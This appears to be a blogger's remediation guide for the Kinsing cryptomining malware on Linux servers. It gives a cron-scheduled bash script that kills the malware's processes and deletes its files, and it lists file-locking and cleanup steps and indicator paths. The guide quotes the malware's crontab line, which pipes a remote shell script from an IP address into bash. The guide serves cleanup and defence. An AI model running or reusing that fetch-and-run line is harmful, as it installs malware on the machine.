Too many problem solver on the internet does not resolve the malware infection about kinsing. The kinsing malware also infected the network & listen into network port.
Do not delete the url of wget or curl command from kinsing malware, just comment it like. There are script checking about the crontab file
# your another crontab
# * * * * * curl http://185.122.204.197/cp.sh | bash > /dev/null 2>&1
You should need add attribute to prevent crontab file change (but it will change if kinsing run) we just test it
chattr +i /var/spool/crontabs/root
Create bash script about kinsing killer on the root path (use any file name eg: /root/killer-kin.sh
)
Make sure net-utils
/ net-tools
is installed and put the file into cron directory /etc/cron.d/killer-kin
MAILTO=''
# KILLER
* * * * * root /bin/bash /root/killer-kin.sh
/root/killer-kin.sh executable script
#!/bin/bash
# ALSO TEST THE SSH STATUS
STATUS_SSH=$(pgrep ssh)
if [[ "${STATUS_SSH}" = "" ]]; then
echo "SSH STOPPED! STARTING";
/usr/bin/systemctl start ssh
else
echo "SSH RUNNING"
fi
# DELETE PRELOAD LD LIBRARY
echo '' > /etc/ld.so.preload
# BOT SERVICE IS KINSING SERVICE
/usr/bin/systemctl stop bot.service &>/dev/null
/usr/bin/systemctl disable bot.service &>/dev/null
# DELETE BOT SERVICE
echo '' > /lib/systemd/system/bot.service
# KILL THE KINSING FROM NETWORK
KINSING_PROC=$(netstat -tlp | grep kinsing | awk '/kinsing */ {split($NF,a,"/"); print a[1]}')
KDEV_PROC=$(netstat -tlp | grep kdevtmpfsi | awk '/kdevtmpfsi */ {split($NF,a,"/"); print a[1]}')
if [[ $KINSING_PROC =~ ^[0-9]+$ ]]; then
echo "KINSING FOUND IN NETWORK -> ${KINSING_PROC}";
kill $KINSING_PROC
fi
if [[ $KDEV_PROC =~ ^[0-9]+$ ]]; then
echo "KDEVTMPFSI FOUND IN NETWORK -> ${KDEV_PROC}";
kill $KDEV_PROC
fi
# KILL THE KINSING PROCESS
if [[ $(pgrep kdevtmpfsi) != "" ]];then
echo "MALWARE KDEV FOUND";
kill $(pgrep kdevtmp)
fi
if [[ $(pgrep kinsing) != "" ]]; then
echo "MALWARE KIN FOUND";
kill $(pgrep kinsing)
fi
# REMOVE KINSING FROM TMP & DATA DIRECTORY
echo "DELETING KIN"
rm -f /tmp/kdevtmpfsi* /tmp/kinsing* /var/tmp/kinsing* /var/tmp/kdevtmpfsi* /etc/data/kinsing /etc/data/libsystem.so
# LAST ... FIND KINSING FROM ANY DIRECTORY
# BUT THIS IS NOT WORTH WHEN RUNNING PER MINUTES
#find / -iname kdevtmpfsi* -exec rm -fv {} \;
#find / -iname kinsing* -exec rm -fv {} \;
Check the file /etc/ld.so.preload
contain /etc/data/libsystem.so
and commonly kinsing executable file in /etc/data/kinsing
- Kinsing executable file
/etc/data/kinsing
- Kinsing library file
/etc/data/libsystem.so
or/dev/shm/libsystem.so
- Kinsing prevent watchdog to run, open the
/etc/sysctl.conf
, appendingnmi_watchdog=0
- Temporary downloaded kinsing file
(/var)?/tmp/kinsing[0-9]+?
&(/var)?/tmp/kdevtmpfsi[0-9]+?
(regex)
Limit the files
- Edit
/etc/sysctl.conf
add config that you need and then run :chattr +i /etc/sysctl.conf
- create empty file to the
echo '' > /tmp/kinsing
&echo '' > /tmp/kdevtmpfsi
then runchattr +i /tmp/kinsing /tmp/kdevtmpfsi
- overwrite kinsing & libsystem.so :
echo '' > /etc/data/kinsing
&echo '' > /detc/data/libsystem.so
then runchattr +i /etc/data/kinsing /etc/data/libsystem.so
Recommended to make clean install or reinstall the server